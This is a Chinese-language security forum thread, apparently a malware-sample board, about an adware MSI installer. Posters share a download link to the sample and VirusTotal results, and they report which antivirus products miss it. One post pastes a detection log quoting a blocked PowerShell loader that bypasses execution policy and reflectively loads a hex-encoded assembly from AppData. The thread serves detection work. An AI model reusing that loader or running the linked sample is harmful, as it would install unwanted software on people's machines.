ADware-MSI 1X

显示全部楼层 · 发表于 2023-9-24 23:07:37

本帖最后由 UNknownOoo 于 2023-9-25 21:39 编辑

VT二扫：2/60

https://wwjw.lanzouq.com/ikltD19siyfg

显示全部楼层 · 发表于 2023-9-24 23:09:57

显示全部楼层 · 发表于 2023-9-24 23:11:20

本帖最后由 swizzer 于 2023-9-24 23:28 编辑

SentinelOne missed.

BD给出的分类是Adware.
https://www.virustotal.com/gui/f ... 6188b9e8c9b622dc3fd

显示全部楼层 · 发表于 2023-9-24 23:18:14

https://www.virustotal.com/gui/d ... front.net/relations

Adware？

显示全部楼层 · 发表于 2023-9-24 23:21:04

显示全部楼层 · 发表于 2023-9-24 23:27:58

ESETmiss，样本已上传

显示全部楼层 · 发表于 2023-9-25 00:30:00

实时防护检测到威胁Gen:Variant.Application.BrowserAssistant.1。未采取任何操作。此项目将由node.exe(C:\Users\fengye\AppData\Roaming\Browser Assistant\edge\x86\node.exe)进一步处理。这是AMSI反恶意软件扫描接口检测。
实时防护在C:\Users\fengye\AppData\Local\Temp\pss6669.tmp.ps1上检测到恶意行为Heur.BZC.ZFV.Boxter.830.A5ED6412。未采取任何操作。此项目将由powershell.exe(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe)进一步处理。这是AMSI反恶意软件扫描接口检测。
实时防护在C:\Users\fengye\AppData\Local\Temp\pss6D24.tmp.ps1上检测到恶意行为Heur.BZC.ZFV.Boxter.830.9F0A390E。未采取任何操作。此项目将由powershell.exe(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe)进一步处理。这是AMSI反恶意软件扫描接口检测。
实时防护检测到恶意命令行的执行。进程 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 被阻止, 由于执行了恶意命令行"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noninteractive -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/BBWC/';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Newtonsoft.Json.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'System.Data.SQLite.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'ICSharpCode.SharpZipLib.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'LZ4.dll'));$f=$w+'WC.txt';$h=Get-Content -Path $f -Raw;$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.StartUp]::Start()"
实时防护检测到威胁。该文件已被删除。C:\Users\fengye\AppData\Roaming\BBWC\updater.exe 是恶意软件 Gen:Variant.Adware.Blazer.1

显示全部楼层 · 发表于 2023-9-25 08:11:15

金山毒霸扫描miss

显示全部楼层 · 发表于 2023-9-25 08:37:05

本帖最后由 hhhq316 于 2023-9-25 17:14 编辑

蜘蛛

显示全部楼层 · 发表于 2023-9-25 08:38:11

360扫描miss

[病毒样本] ADware-MSI 1X

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源